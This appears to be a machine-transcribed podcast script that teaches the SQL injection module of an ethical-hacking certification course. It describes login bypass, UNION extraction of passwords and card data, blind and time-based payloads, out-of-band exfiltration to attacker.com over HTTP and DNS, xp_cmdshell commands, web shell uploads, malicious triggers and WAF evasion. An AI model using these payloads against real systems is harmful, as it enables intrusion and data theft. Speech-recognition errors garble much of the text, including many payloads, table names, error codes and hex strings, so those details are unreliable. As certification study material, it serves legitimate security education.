Welcome to AudioCert, where the official study guides are brought to life. Welcome back to the deep dive. Today we're really taking a plunge, not just scratching the surface. We're diving into EC Council's Certified Ethical Hacker, or CEHv13, specifically Module 15, SQL Injection. Now, for you, a curious learner, our mission today is pretty clear. We want to equip you with a rock-solid understanding of SQL injection, what it is, how devastating it can be, and the intricate ways attackers actually exploit it. Think of this as your essential guide, your shortcut, really, to understanding one of the most persistent and frankly damaging web application attacks out there. Now, just pause for a second and think about this. Could that simple search bar you use every day, or that login field you type into without a second thought, could that actually be a secret doorway, like wide open, to an entire company's most sensitive data? Today, we're pulling back the curtain on structured query language injection, SQL injection for short. It's an attack that's so common, so damaging across the board that really understanding its nuances isn't just a suggestion for anyone serious about cybersecurity. It's an absolute must.
It absolutely is. It's foundational, really. And we're not just talking about, grabbing a bit of data here and there. SQL injection attacks can fundamentally break a web application's entire functionality. They can shatter an organization's reputation, sometimes built over years. And in the worst cases, they can give an attacker direct control over the server's operating system itself. It's a vulnerability that honestly keeps popping up, plaguing organizations everywhere, often because of one sort of glaring oversight, not properly checking or sanitizing user input. So by the end of this deep dive, you won't just get the basic idea of SQL injection. You'll understand the whole spectrum, the different attack types, the step-by-step method attackers use, the tools they leverage, those crucial evasion techniques, and maybe most importantly, if you're aiming to be an ethical hacker, the solid countermeasures you need to know.
Okay, let's break this down right from the beginning. Before we even talk about injection, we really need to nail down what SQL actually is. Can you give us the lowdown on structured query language? Why is it so fundamental to pretty much every website or app we use?
Absolutely, yeah. It really is the bedrock. So structured query language, SQL, it's essentially the universal language spoken by database servers all over the world. Think of it as the common tongue computers use to manage data, manipulate it, get it back when needed. Super efficient. Every time you log in, search for something online, save a post, that web application. It's almost certainly talking to a database on the back end using SQL commands. We're talking about core stuff like insert to add new data, select to pull specific info, update to change things, and delete to remove records. These are the workhorses, the basic actions for interacting with data in almost any application that uses it. But here's the crucial part, where the vulnerability often creeps in. Modern web developers, they often don't just write fixed static SQL commands. No, they build these commands on the fly, dynamically. They incorporate client-supplied parameters, stuff like your username, your password, maybe a search term you typed in directly into that SQL query string. Now, this dynamic approach is what makes websites rich and interactive, right? Data-driven. Sure. If it's not handled very, very carefully, it opens up a huge security hole.
Okay, right. Here's where it gets really interesting then. If SQL is a language the database speaks, what exactly is SQL injection? What's the core concept there?
Right. SQL injection is a technique, a really powerful one, that exploits a specific weakness in web applications. It's this failure to properly sanitize user input. What that means is an attacker cleverly crafts malicious SQL commands and puts them into, say, a login field or a search box. The web application, because it hasn't checked or cleaned that input properly, just takes it and passes it straight through to the backend database. And the database, well, it doesn't know any better. It just executes the attacker's instructions along with the intended ones. It sounds simple, but it's incredibly powerful. It can lead to anything from just seeing data you shouldn't to, like I said, completely taking over the server. And it's really, really important to get this. SQL injection is not a flaw in the database software itself or the web server.
Okay, that's key.
Yeah, the vulnerability is squarely in the web application's code. The application just blindly trusts whatever the user types in. It doesn't check if it contains harmful instructions. Think of it like this. Imagine a restaurant, right? You write your order on a piece of paper for the chef. Now, if the chef just cooks whatever is written on that paper, no questions asked. It doesn't check if it's actually in the menu, or if you wrote maybe, cook my steak, ND, then burn down the kitchen.
Right.
That's the vulnerability. The chef just doing it. SQL injection is like writing that malicious instruction, burn down the kitchen, right onto the order slip.
That analogy paints a a pretty clear picture of the danger. But okay, let's talk real-world consequences.
Yeah.
For our listener, the learner, why should they really care about this beyond just, theory in a book?
Oh, the consequences are huge. And they hit hard. They impact an organization's money, its reputation, its data, its ability to function. We've seen massive financial losses, reputations totally destroyed, vast amounts of sensitive data stolen, applications completely knocked offline. SQL injection enables several kinds of really damaging attacks. First, and probably the most common, is authentication bypass. This lets an attacker just waltz past the login screen. No valid username, no password needed. They get in, often straight to admin level. Imagine logging into, say, your company's internal system, not just as you, but as the CEO, without knowing their password.
Wow.
Then there's authorization bypass. This is kind of the next step. The attacker doesn't just get in, they actually change permissions stored in the database. So a regular user account. Suddenly it has admin rights, full access to everything. Next up is information disclosure. This is often the main goal. Attackers grab sensitive stuff, credit card numbers, personal details, PII company secrets, maybe even health records. This data then gets sold, leaked online, or used for even bigger attacks.
That's scary stuff.
It is. And then there's compromised data integrity. Here, they're not just reading data, they're changing it. They could deface a public website, inject nasty content, or worse, alter critical data. Imagine your bank balance suddenly showing 0. Or someone changing your grades in the university system.
Oh, man.
Exactly. Then we have compromised availability of data. This often leads to a denial of service or DOLS. Attackers might delete huge chunks of the database, wipe out logs so they can't be traced, or just make the whole application grind to a halt. Serious downtime, serious money lost. And finally, the absolute worst case scenario, remote code execution, or RCE. This is the attacker's jackpot. It means they don't just control the database anymore. They compromise the actual operating system of the server the database is running on, full control. It goes from a data breach to a complete system takeover.
So just to hammer this home, it's fundamentally a web application problem. Could you talk a bit about the typical technologies involved?
Yeah.
And how do simple things like HTTP requests actually play into these attacks?
Sure. And yeah, it's vital to stress this isn't tied to one specific technology. We see SQL injection across pretty much all the major server-side platforms used to build dynamic websites. Things like ASP, ASP.NET, Cold Fusion, JSP, that's Java Server Pages, PHP, Python, Ruby on Rails, you name it. And it affects all the big relational database systems too, Microsoft SQL Server, Oracle, IBM DB2, MySQL, PostgreSQL. But the crucial point, again, is that these technologies themselves aren't inherently flawed. It's the coding practices. It's when developers don't securely handle user input when they use these tools. The attacks target applications where secure coding guidelines just weren't followed. Now, when you interact with a website, maybe submitting that login form we talked about, your beta username, password usually gets sent to the server using an HTTP POST request. Unlike GT requests, where the data is visible right there in the URL in your browser bar, POST sends the data in the body of the request.
Right, so it feels a bit more hidden.
Exactly. It gives a false sense of security. But it's just as vulnerable to SQL injection if that data isn't properly checked, isn't sanitized, before it's used in a database query. For instance, a normal, successful login might trigger a query on the server like, select from users where is username and missing password Simpson, simple check for a matching record.
Let's make this really concrete. Can you walk us through a totally normal login, step by step, and then show us exactly how an attacker twists that with an injection?
Okay, perfect. Let's ping that picture. Standard login page. User Peter comes along. He enters his username Peter and his password say PN4. The web application takes these 2 bits of info. Behind the scenes, it builds in SQL query, usually something like select count from users where username Peter and password equal Peter. The query's job is simple. Count how many rows in the user table match both the username and password Peter gave. If the count is 1 or more, usually 1, he's authenticated. Login successful. Now, from a coding perspective, the vulnerable code often just sticks these inputs straight into the query string. Like maybe some C# code looks like this. String3 query, select count from users where username plus txt user, text plus Sam password plus txt password, text plus here. See how txt user, the username, and txt password text, the password are just slammed right in.
Yeah, I see it. Directly concatenated.
Exactly. Now, here comes the attacker. Instead of Peter, they type this into the username field. Blah or R1 equals 1. And for the password. Doesn't matter. They can leave it blank, type garbage. It's irrelevant. Because when the vulnerable application builds its query with that malicious username input, the SQL statement that actually gets sent to the database looks like this. Select count from users, where username blah or 1 and password, whatever.
Whoa, hang on. What happened there?
Syntax.
Especially after those two hyphens, where did the password check go?
Ah, that's the magic trick. Or the devastating flaw, depending on your perspective. In many SQL dialects, those two hyphens signal the start of a comment. It tells the database server, ignore everything else on this line from here to the end.
Oh, okay.
So that whole legitimate password check, the anti-password, whatever part, it just gets commented out. Poof. Gone. Ignored by the database. The database now sees and executes this simplified query, select count, from users where username blah or 1. Now let's look at that where clause. Username blah or 1. The critical part is 1 on 1. That's always true, right? Basic math.
Always true. Yeah.
And because of the OR operator, if any part of the condition is true, the whole where clause becomes true. So even though username blah is probably false, the 1 makes the entire condition true. Boom, password check completely bypassed. The database finds matches based on 1 being true, returns a count greater than 0, and the application thinks the login was successful. Attacker's in. It's like telling the bouncer, let me in. Oh, and ignore what I just said about the secret handshake. This other thing is definitely true, so I get in anyway.
Wow.
And the root cause, going back to the code, was that direct concatenation, just sticking txt user text into the SQL string without checking it first. That's what allows the attacker to inject their own logic.
That's an incredibly clear and, yes, stark example of how dangerous a simple input can be. Can you give us another scenario, maybe something beyond just logins?
Absolutely. Let's think about e-commerce. A common feature is a product listing page, maybe badproductlist.aspx or something similar. These pages often have a search or filter box, right? Let's call it txt filter. You type in shoes or laptops to narrow down the list. Behind the scenes, a typical, maybe slightly naive application might build its query like this. Select producted, product name, quantity per unit price from products where product name like 60 plus user input plus %. Again, notice the direct inclusion of the user input from txt filter.
Right, the same pattern, vulnerable.
Exactly. So an attacker, instead of typing shoes, might enter something much more devious into that filter box, like this. Union select id, name Eddie, from SUS objects where X type UO.
Whoa, okay, union select and cease objects. That looks way more complicated. What's going on there?
You're right, it is more complex. And this is where the union operator becomes incredibly powerful for attackers. Union is a standard SQL command that lets you combine the results of 2 or more select queries into a single result set. So the original query wants to show product details, but the attacker injects a second query using union. This second query, select id, name 0 from SICE objects where X type U, is designed to do something completely different. SICE objects, or similar tables like information schema and other databases, is like the database's internal map. It holds metadata about all the objects within the database tables, columns, procedures, etc. By querying where X type U, the attacker is specifically asking for all user-defined tables. These are usually the interesting ones, holding data like users, orders, credit cards.
Ah, so they're using the product search to actually ask the database about its own structure.
Precisely. The attacker's challenge is to make their injected union select have the same number of columns and compatible data types as the original product query, if they get that right. The product listing page might suddenly display table names like users or customers mixed in with, or even instead of, the actual product names.
That's sneaky. So once they know the table names,
then they follow up. Once they've found a juicy table name, maybe users, they can inject another query into that same filter box, like union select 0, username, password 0 from users edge. Now, assuming the column count and types match again, this query uses union to extract the actual usernames and password hashes directly from that user's table, displaying them right there on the web page, probably where product names should be. It's like you asked the waiter for the specials menu, but you secretly slipped in a note saying, oh, and also list the contents of the restaurant's safe deposit box.
Wow, and you mentioned this isn't just search fields.
No, absolutely not. Think about forgot password pages. An attacker might manipulate the email field to trick the system into sending someone else's password reset link to their email address, or any place you can update data profile settings, forum posts, anything that writes to the database. If that input isn't validated, it could be vulnerable to an update or insert injection. The common thread every single time is that the application took user input and trusted it too much, embedding it directly into SQL commands without proper checks.
Wow, okay. So a single input field really can be the weak link in the entire chain. So it sounds like there's more than one way to pull off these attacks. Can you maybe categorize them for us? Break down the different types.
You got it. SQL injection isn't just one thing. Attackers have a whole toolbox of techniques. We usually group them into three main categories. Think of it like different ways to approach that locked building we talked about. Some methods are direct, you just kick the door down. Some require more subtle investigation, like picking the lock. And some involve coordinating with someone outside, maybe getting them to pass information out a window. These categories are in-band SQL injection, blind or inferential SQL injection, and out-of-band SQL injection.
That's a helpful way to think about it. Let's start with in-band. What are the common approaches there, and why is that one usually considered the most common or easiest?
Right. In-band is often the go-to because it's the most straightforward. The attacker uses the same channel, usually the web application's response back to their browser, to both launch the attack and get the results. The feedback is direct. Data or errors come right back. One major type within in-band is error-based SQL injection. Here, the attacker intentionally feeds the application bad or malformed input. The goal is to make the database itself generate detailed error messages. If the application isn't configured to hide these errors, they can leak a goldmine of information database structure, table names, column names, sometimes even software versions. For example, an attacker targeting Oracle might try to misuse a function like uLINA Dr. Gethos name by giving it a subquery that returns, say, the current database user instead of a valid host name. Like uLINA Dr. Gethos name, select user from dual. This forces an Oracle error, like ORARray 292257, host Scott unknown. But look, the error message itself contains Scott, the database username leaked directly back to the attacker through the error.
So they're deliberately causing errors to make the database spill its secrets.
Exactly. It's like deliberately messing up your food order just to get the chef to yell out all the secret ingredients in the kitchen. Another vector is exploiting system-stored procedures. Lots of apps use these pre-written SQL code blocks for common tasks, like logins. If these procedures build SQL queries dynamically inside themselves and they don't sanitize the input parameters they receive, well, an attacker can inject malicious SQL right into those parameters. A login procedure might be bypassed with input like any username or 141. Then there are illegal or logically incorrect queries, similar to error-based, but maybe simpler. Just sending syntactically wrong SQL can trigger errors revealing structure. Inputting just a single quote might give back an error like unclosed quotation mark, which tells the attacker how strings are being handled in the query.
Okay, makes sense. What about that union attack we discussed earlier? That sounds pretty powerful for getting data out.
It's extremely powerful, yes. That's union SQL injection. It leverages the union operator to merge the results of the attacker's malicious select query with the results of the original legitimate query the application was trying to run. The big hurdle for the attacker is figuring out the number and data types of the columns in the original query's result set. Their injected union select has to match perfectly. They usually figure out the column count first, often using the order by clause. They'll try order by 1, order by 2, order by 3 at, and so on until the database throws an error. If order by 5 works but order by 6 fails, they know there are 5 columns.
Clever.
Yeah. Then they have to guess the data types. They might try union select null, null hennull, NL, and null NL if 5 columns. If that works, great. If it errors, they start swapping NL with things like 1 for numbers or A for strings until the query runs without a type mismatch error. Once they have the structure, they can inject their real payload, like but, union all select credit card number, expiate, CVV, and null from credit card tupely. Suddenly, credit card details might appear on the page instead of, or mixed with, the expected content.
So you're basically tacking your own data request onto the end of the legitimate one.
Precisely. You're getting your friend's phone number, but also secretly pulling credit card numbers from a completely different list in the same request. We also have tautology attacks. These are elegantly simple. You craft a where clause condition that is always true. The classic is or 1-1. So a query becomes select from users where name or 1-1. Since 1-1 is always true, the whole where clause is true. Boom, authentication bypassed. It's the ultimate trust me it's true statement, and a vulnerable database falls for it.
And the comment trick we saw earlier.
Yep, that's end-of-line commenting. Using, or sometimes hashtag in MySQL, to just chop off the rest of the original query after the injection point. Super common for login bypass at admin delete. The password check just gets ignored. Similar are inline comments using dead. These are often used to break up keywords to evade simple filters or blacklists, remove spaces, or just generally obfuscate the injected code. CEHv13 might bypass a filter looking for the word select. And finally, within in-band, there's piggybacked queries or stacked queries. This is where the attacker uses a semicolon to just stick a whole second completely separate malicious query onto the end of the original one. For example, Select from products where id equals 123, drop table users. If the database and the connection methods support executing multiple statements separated by semicolons, not all do, it will run the select, and then it will run the drop table users. Devastating.
Wow. Okay, so that's ordering your pizza and then telling them to burn down the store in the same order.
Exactly. And the system just dutifully does both if it's vulnerable.
Okay, so in-band is all about getting that direct feedback, seeing the errors or the data right there. But what if the application is, better designed? What if it just gives a generic error page, or maybe the page looks slightly different but no useful info? How do attackers deal with that?
Now you're asking about blind or inferential SQL injection. This is the technique attackers turn to when they don't get direct feedback. No helpful error messages, no data spilling out onto the page. Instead, they might just see a generic "an error occurred" page, or maybe the page content changes subtly, or maybe it just takes longer to load. The attacker has to infer information by asking the database a series of true-false questions and carefully watching for these subtle changes in response. It's way more time-consuming because you're often extracting data one single bit or one character at a time.
True-false questions. How does that work?
Well, there are a couple of main ways. One is time-based SQL injection. Here, the attacker injects a command that tells the database, if this condition is true, pause for X seconds before responding. Oh. So for Microsoft SQL Server, they might use wait for delay 0.0.10, wait 10 seconds. For MySQL, maybe benchmark 500,000 MD5 test, which forces the CPU to work hard for a noticeable time. An attacker could inject something like an if substring at version 1.1 equals 5 sleep 10 0 2. This asks, is the first character of the database version number of 5? If yes, pause for 10 seconds. If the page takes 10 seconds longer to load, the attacker knows the answer is yes.
So they're using time delays as a yes-no signal.
Exactly. It's like knocking on a door and timing how long it takes for the lights inside to turn on. A long delay suggests someone's home, even if they don't answer. The other main blind technique is Boolean exploitation, or content-based blind. This relies on seeing some difference in the application's response based on whether an injected condition is true or false. Maybe if the condition is true, the page loads normally. If it's false, maybe a specific image is missing, or a certain piece of text doesn't appear, or you get that generic error page. For example, product.php.id1 and d1 and d112 might show product not found, or just a blank section. By injecting conditions that guess database names, table names, column content, character by character, and ASCII substring database, the attacker can slowly piece together information based on which requests result in the true response versus the false response.
That sounds incredibly tedious.
It is, but highly effective when direct output is blocked. There's also a related technique called heavy query injection. If time delay functions like sleep or wait for are disabled by the admin, attackers can sometimes still force a delay. They do this by injecting queries that make a database perform a really complex, resource-intensive operation, like joining huge system tables multiple times. Select count from sys.objects st1, sys.objects st2, sys.objects st3. This massive computation naturally takes time, creating an observable delay, achieving the same effect as sleep.
Okay, so making the database think really hard to cause a delay. Clever. So we've got in-band for direct feedback, blind for inferred feedback. What was the third category you mentioned? The more complex one.
That's out-of-band SQL injection. This is generally the trickiest, but can be very powerful when other methods fail, especially if firewalls are blocking outbound data in the HTTP response. Here, the attacker doesn't use the web application's response channel to get the data out. Instead, they trick the database server itself into sending the data to an external system that the attacker controls, using a different network protocol or channel. It requires the database server to have capabilities to make outbound network connections, and the attacker needs to understand how to trigger those features.
How would that work? What kind of features are we talking about?
Well, some database systems have built-in functions for things like making HTTP requests, performing DNS lookups, or even sending emails or interacting with network file shares, like SMB. An attacker might exploit Oracle's util-http request function, for instance. They could inject something like union select util-http.request http.attacker.com select password from users where username admin. From dual-up, this injected code tells the Oracle database, make an HTTP request to attacker.com and append the admin user's password to the URL path. Yeah. The attacker has a listener running on attacker.com, maybe just using a simple tool like Netcat or a custom web server. They just watch their logs, and suddenly an incoming request arrives from the victim database server, with the admin password sitting right there in the requested URL.
So the database itself sends the data out, completely bypassing the web application's normal response.
Exactly. It could also be done using DNS requests. An attacker might inject code that forces the database to look up a DNS name like stolendata.attacker-dns-server.com. The attacker controls that DNS server and logs all incoming queries, capturing the stolen data part. It's like asking the librarian a question, but instead of getting a note back, the librarian secretly makes a phone call to the attacker's number and reads them the answer. It bypasses all the library's normal communication channels, requires more setup, more knowledge of specific database features, but can be very effective against tight security.
That's a really clear breakdown of the different ways these attacks work. Now, for the learner listening, how does someone actually do this? Whether it's an ethical hacker testing a system or a malicious actor attacking it, what's the systematic approach? What's the methodology they follow?
Right, it's not usually random guesswork. Attackers, good or bad, follow a pretty structured process. Think of it like a recipe designed to systematically find and exploit weaknesses. We can break it down into roughly 3 main phases. Phase 1 is all about information gathering and vulnerability detection. Phase 2 is launching the attack, the actual exploitation. And Phase 3, if successful, might involve advanced exploitation and post-exploitation, like digging deeper into the network or maintaining access.
Okay, phase 1, info gathering. So before even trying an injection, it's all about reconnaissance, right? Knowing the target.
Exactly. Recon is absolutely crucial. You can't craft an effective SQL injection payload without understanding the target environment. Attackers are trying to figure out things like, what database software is it? MySQL, MS SQL, Oracle, etc. What version is it running? What are the database names, table names, column names? What user account is the web application using to connect? How privileged is that account? Can the database interact with the operating system? And as we discussed, those error messages are often pure gold during this phase. If the application leaks verbose errors, it can hand over a lot of this information on a silver platter. Attackers also meticulously map out all the data entry paths. Where can they possibly inject input? It's not just login forms and search boxes. They look at everything. URL parameters, the stuff after the POSD data from forms, hidden form fields that users don't normally see, even HTTP headers like user agent or cookies, because sometimes applications use that data in backend queries.
So they're probing every possible way data gets into the application.
Every single one. And they use tools for this. Burp Suite is probably the most famous proxy tool. It sits between your browser and the web server, letting you intercept, inspect, and modify every single HTTP request and response. Browser extensions like tamper data or built-in developer tools also let you fiddle with requests. Think of these as your magnifying glass and toolkit for examining and tweaking that data flow.
So how do they use those error messages specifically during this recon phase to get actionable intel?
Well, several ways. Parameter tampering is a basic one, just changing values in the URL or form data to see what breaks. Product.php.id1 becomes product.php.ids or id1 and1 Observing the errors tells you if it's vulnerable and potentially how. They try to determine the database engine type. Sometimes injecting invalid syntax triggers an error message that explicitly names the database, like Microsoft OLEDB provider for SQL Server error or Oracle ORA. If not, they might guess based on the web server technology, like ISA often means MS SQL, Apache PHP often means MySQL. They work hard to determine the select query structure. For union attacks, remember, they need the column count and types. Forcing errors with order by or injecting group by Y clauses can reveal column names or counts through the error messages generated. Type mismatch errors are great clues. If you inject text into a field expecting a number and get an error like syntax error converting varchar value test to data type int, you've learned something valuable about that column's data type. And if they try all this and get no detailed errors, just generic 500 server error pages, that's a big flag pointing towards blind SQL injection. It tells them direct information leakage is probably blocked, so they need to switch to those inferential true-false techniques.
Gotcha. And you mentioned cheat sheets or testing strings earlier. How do those fit in here?
Ah, yeah, the cheat sheets. These are basically collections of standard, known-to-work, sometimes SQL injection payloads. Attackers and pen testers use them as quick probes. They'll try common things like OR11 or ORA, or maybe URL encoded versions like 207%, 207%, 200%, 2011. They might try database-specific commands like wait for delay 0.0.5 for MS SQL time-based blind. It's like having a set of universal keys. You try them in every lock you find, hoping one will turn and reveal a vulnerability without needing to craft something custom right away.
Makes sense. Are there other ways they detect these vulnerabilities besides just poking with strings and looking at errors?
Oh yes, several more systematic methods. Function testing, a type of black box testing, involves just using the application normally but feeding it unexpected or boundary case inputs, comparing the actual output to what should happen. Deviations might hint at issues. Fuzz testing, or fuzzing, is more automated and chaotic. You use tools like Burp Intruder, OWASP, Zypes Fuzzer, or specialized tools like BStorm or AppScan Standard to bombard input fields with a huge amount of random, malformed, unexpected data, the fuzz. The goal is to crash the application or trigger weird behavior that reveals underlying flaws, including SQLI. Then there's static code analysis, SQLIS. This is usually done with access to the source code, often during development. Tools scan the code itself without running it, looking for patterns indicative of vulnerabilities like improper handling of user input or direct concatenation into SQL strings. And dynamic code analysis, DECWIDES. This tests the running application, interacting with it like a user or an attacker would, analyzing its responses and runtime behavior to find vulnerabilities, often without needing the source code.
Okay, so black box, white box, fuzzing, lots of approaches. What about specifically testing for SQL in a black box pen test?
Right. In a black box scenario where you have no code access, you rely heavily on those input probes, sending single quotes, double quotes, brackets. Looking for any SQL-related error message is a strong indicator. Another trick is testing for truncation. You send a really, really long string of garbage characters into an input field. If the backend code has a fixed size buffer for the SQL command string, your long input might get cut off, truncated, in a way that creates invalid SQL syntax, causing an error. That error tells you truncation occurred, which itself might be exploitable.
And if you do have the source code, white box testing.
Then you do source code review. This is often the most effective way to find SQL. You, or an automated tool like Veracode, SonarQueb, PVS Studio, systematically examine the third, looking specifically for how database queries are constructed and executed. Are they using parameterized queries, or are they doing that dangerous string concatenation? Static versus dynamic analysis comes into play here too. SAS looks at the code itself, DAST watches how it runs, and specifically for testing for blind SQL injection, it really comes down to those simple true-false tests. Manipulate a URL parameter, id 101 AND10. Does the page change compared to id 101 801 Wingle 1? If yes, even subtly, you've likely found a blind spot.
Okay, so that's a thorough look at finding the vulnerability. Once you've done that homework and confirmed a weak spot, it's time for phase 2, launching the attack. What are some of the most common ways attackers actually exploit these flaws?
Right, this is where the theoretical vulnerability turns into actual impact. The ethical hacker starts using the confirmed flaw to achieve specific goals. They might perform error-based SQL injection systematically, using techniques like convert, at version, and MS SQL to force the database version into an error message. Then using similar tricks with DBNE, querying C-subjects or information schema and forcing results into errors to map out the entire database structure, tables, columns, data types, all abstracted via error messages. Or perform error-based SQL injection using stored procedures. If they found a vulnerable procedure during recon, they now inject payloads into its parameters to execute commands or extract data, again leveraging error messages if possible. Union SQL injection for data extraction is a classic exploitation path. Having figured out the column count and types in phase 1, they now use union select all methodically. First, get database name, select DB name. Then get table names from that DB, union select table name from information schema.tables, where table schema DB name. Then column names from a target table, union select column name from information schema.columns, where table name users. And finally, dump the actual data, union select username password from users, step-by-step extraction.
Right, building up the picture piece by piece.
Exactly. Bypassing website logins is often the first major goal. The iconic ORR11 is tried everywhere. They might also try bypassing hash checks, maybe union select admin, known hash value, if they suspect how the check works. When errors are suppressed, they shift to performing blind SQL injection, Boolean time-based, for data extraction. This is that painstaking character-by-character extraction. For MySQL SQL, they'll use functions like length, substring, ASCII, sleep, benchmark. The process looks like: 1. Find the length of the data, for example, in length database. 2. Guess each character's ASCII value, for example, an ASCII substring database, 100. They rely on those time delays for time-based or page differences for Boolean-based to confirm each guess. It's slow, like playing that game of hangman against the database, but it gets the data out eventually.
Wow, that requires patience.
Definitely. A slightly different approach is exporting values with regular expression attacks. If they know a table like user info, they can use regexp in MySQL, or like in MSQL Oracle to guess patterns in data, especially useful for hashed passwords. And password like A% checks if the hash starts with A. And password regexp checks if the second character is B. Helps narrow down brute force attempts. Double-blind SQL injection is for when even Boolean responses are unclear. You rely on even subtler side channels, maybe server processing load differences or very fine-grained timing, often using those benchmark or heavy query techniques. Extremely difficult. And blind SQL injection, using out-of-band exploitation, is the fallback when even timing doesn't work reliably or firewalls block everything. Using Oracle's UTL HTTP request or MS SQL's exploiter tree to force an external DNS lookup or HTTP request containing the data captured on the attacker server via tools like Netcat.
You mentioned second-order injection earlier. How is that exploited?
Right. Exploiting second-order SQL injection. This is sneaky. The attacker injects malicious code that gets stored in the database harmlessly at first, maybe in a username field, a comment, a profile description. Later, a different part of the application reads that stored data and uses it unsanitized in another query. That's when the injection actually triggers. It's a delayed action attack, like planting a time bomb in a data field that only explodes when someone else reads it later. Much harder to detect because the initial input seems fine. Attackers also aim to directly perform SQL injection to insert new users or update passwords. Crafting insert into users values attacker hash password 1 to create an admin account, or update date user set email attacker@evil.com where username victim to hijack the password reset process. Advanced enumeration goes beyond just getting data. They try to figure out privilege levels, select user, select current selected current as member sysadmin, identify powerful DBAs, DSAT, DBO, root, discover the entire database structure using system tables, sys.objects, information schema.tables, information schema.columns to map everything out. Password grabbing and cracking SQL Server hashes is a major objective. Extracting hashes from tables like master.syslogins and MS-SQL, converting them to formats tools like Hashcat or John the Ripper understand, and then running offline brute force or dictionary attacks to get the plaintext password. Sometimes they try to transfer the entire database to the attacker's machine. Using functions like openRowset in MS-SQL to link the compromised database to an attacker-controlled server and just copy everything over.
And you said they can even interact with the OS.
Yes, that's the ultimate prize, interacting with the operating system, reading writing files, executing commands. In MS-SQL, if xpcmd shell is enabled, big if, but it happens, they can run any command the database service account has permission for. exec master.xpcmd shell, ekiconfig, tempnet.txt. Then maybe use blk insert to read net.txt back into a database table to see the output. In MySQL, if they can upload files or exploit certain configurations, they might create user-defined functions, UDFs, like csysexec or sysable, using external libraries .so or .dll files to get OS command execution.
So they're escaping the database and getting onto the server itself.
Exactly. It's like using the bank vaults mechanism to unlock the door to the bank manager's office. They can also interact with the file system directly in some cases, especially MySQL. Load file at 6pass where you can read files if permissions allow. Select into outfile var www.tmlshell.php can write files. Attackers love writing a simple PHP web shell.php system into the web root directory.
But web shell.
Yeah, it's a small script that takes commands from a URL parameter like shell.php.cmd and executes them on the server, giving the attacker a persistent command prompt via their web browser. Huge backdoor. They also use SQL for network reconnaissance. Once they have command execution, like via xpcmd shell, they run commands from the compromised server. ipconfig.all, netstat.dian, traceroute-internal.server, arp8, anacs, lookup, ping. This helps them map out the internal network, finding other targets from that trusted position inside. A simpler goal might be finding and bypassing the admin panel. Using Google Dorks, interl.adminlogin.php entitled admin login to find the login page, then trying standard bypasses like admin or R11 or admin hashtag. Oracle has its own specifics with PL/SQL exploitation. Vulnerabilities can exist in custom PL/SQL procedures that use dynamic SQL execute immediate. Attackers might exploit quote handling or truncation bugs in these procedures, and ultimately they want to create server backdoors for persistent access. That web shell we talked about is one type. Another is a database backdoor using triggers. They inject a malicious trigger. Maybe create trigger, evil trigger, after insert on orders for each row, begin update product, set price 0, where a beat renew.producted end. This automatically sets the price to 0 whenever someone orders that product. Silent automated damage, advanced stuff.
Wow. What about those header-based attacks you mentioned?
Right, HTTP header-based SQL injection. Attackers realize that applications sometimes log or use data from headers like user agent, referer, or especially xforward for, which indicates the original client IP behind a proxy. If this header data isn't sanitized before being put into a database query, maybe for logging or analytics, an attacker can inject SQL right into the header value using a proxy like Burp Suite, X44, 1.2.3.41 or 181, and DNS exfiltration using SQL injection, super sneaky, embedding data into DNS lookups forced by the database like xbcmd shell, select that version, plus.attacker.com. The attacker monitors their DNS server logs to capture the version info, bypasses firewalls that might block direct HTTP TCP outbound, but almost always allow DNS.
And this isn't just limited to SQL databases.
Not at all. MongoDB injection, NoSQL injection, is a growing threat. The principles are similar, exploiting unsanitized input, but the syntax is different. Instead of SQL, attackers inject malicious operators into JSON queries used by MongoDB. Things like where, which allows JavaScript execution, nowhere, not equal, chibichish greater than, regex. They might inject JavaScript like return true into a query clause to bypass authentication, or even an in sleep 5001 for a time-based attack. The core problem of trusting user input remains the same across database types.
Okay, that's a massive toolkit attackers have. But surely there are defenses, right? What about things like web application firewalls, WAFs, or intrusion detection systems, IDS? Can attackers just get around those too?
Unfortunately, yes, often they can. It's a constant cat and mouse game. WAFs and IDS primarily rely on signatures patterns of known malicious requests, so attackers focus on evasion techniques to make their payloads look different from those known signatures.
How do they bypass WAFs specifically?
Several ways. Normalization methods. WAFs often try to normalize input, decode URLs, remove comments, before checking signatures. Attackers exploit this. They might inject something like .id1 comment union comment select comment password from Moser Zab. The WAF might strip the comments, leaving behind .id1 union select password from Moser Zab, which looks weird but might still be executed by the database, while the original obscured version bypassed the WAF's union select signature. HTTP parameter pollution, HTTP, sending multiple parameters with the same name, like .id1i select from users. Some backend systems might concatenate these or only process the last one, potentially confusing the WAF, which might only inspect the first AD1. HTTP parameter fragmentation, HPF, breaking the payload across multiple parameters or parts of the request, hoping the WAF doesn't reassemble it correctly before inspection. Blind SQL injection payloads. As we discussed, these often lack obvious keywords like union or select, making them harder for signature-based WAF to catch. Payloads using logical operators, or timing functions might slip through. Signature bypass, actively modifying the syntax. Using obsessive parentheses, select taste variations, select different encodings, URL, hex, Unicode. Inserting inline comments using alternative keywords if the DB supports them. Buffer overflow methods. Trying to crash the WAF itself by sending extremely long strings, hoping the payload slips through while the WAF is down or recovering. Less common now, but possible against older or poorly coded WAFs. CRLF technique. Using URL-encoded newline characters, Puro Oper 00D, to split the payload across multiple lines in the raw HTTP request, potentially confusing WAF parsers expecting single-line attacks. Integration method, simply combining multiple evasion techniques at once to maximize the chance of bypassing different WAF rules. And JSON-based SQL injection. For no spool or APIs using JSON, attackers might use JSON operators like nut or dollar instead of traditional SQL characters like or hue, bypassing WAFs not specifically configured to inspect JSON syntax deeply.
Okay, so lots of ways to try and fool the wave. What about evading an IDS? Is it similar?
Very similar, yes. IDS also heavily rely on signatures, often implemented as regular expressions looking for known attack strings. So attackers use obfuscation techniques to make their input not match those signatures. Many of the same tricks apply. Inline comments, select, char encoding.
Right.
Using char functions, first AG char 83 plus char 69 plus char 76 for cell, string concatenation, building keywords from parts, obfuscated code, making the SQL itself complex and hard for simple regex to parse correctly, manipulating white spaces, adding tabs, multiple spaces, new lines, select do, omer and 9%, whenis, so /no, hex encoding, representing parts or all of the query in hex, 0 by 53454, C454, 3402020, 465 cell. The goal is always to make the malicious payload look like innocent data to the detection system while still being perfectly understood and executed by the target database. It's like writing your secret message in code so the security guard just sees gibberish, but the intended recipient knows exactly how to decipher it.
This has been an incredibly detailed, almost overwhelming look into SQL injection. For our learner out there, maybe thinking about getting into ethical hacking, what are the actual tools people use, the go-to software for finding and exploiting these vulnerabilities, and how is AI changing this whole landscape?
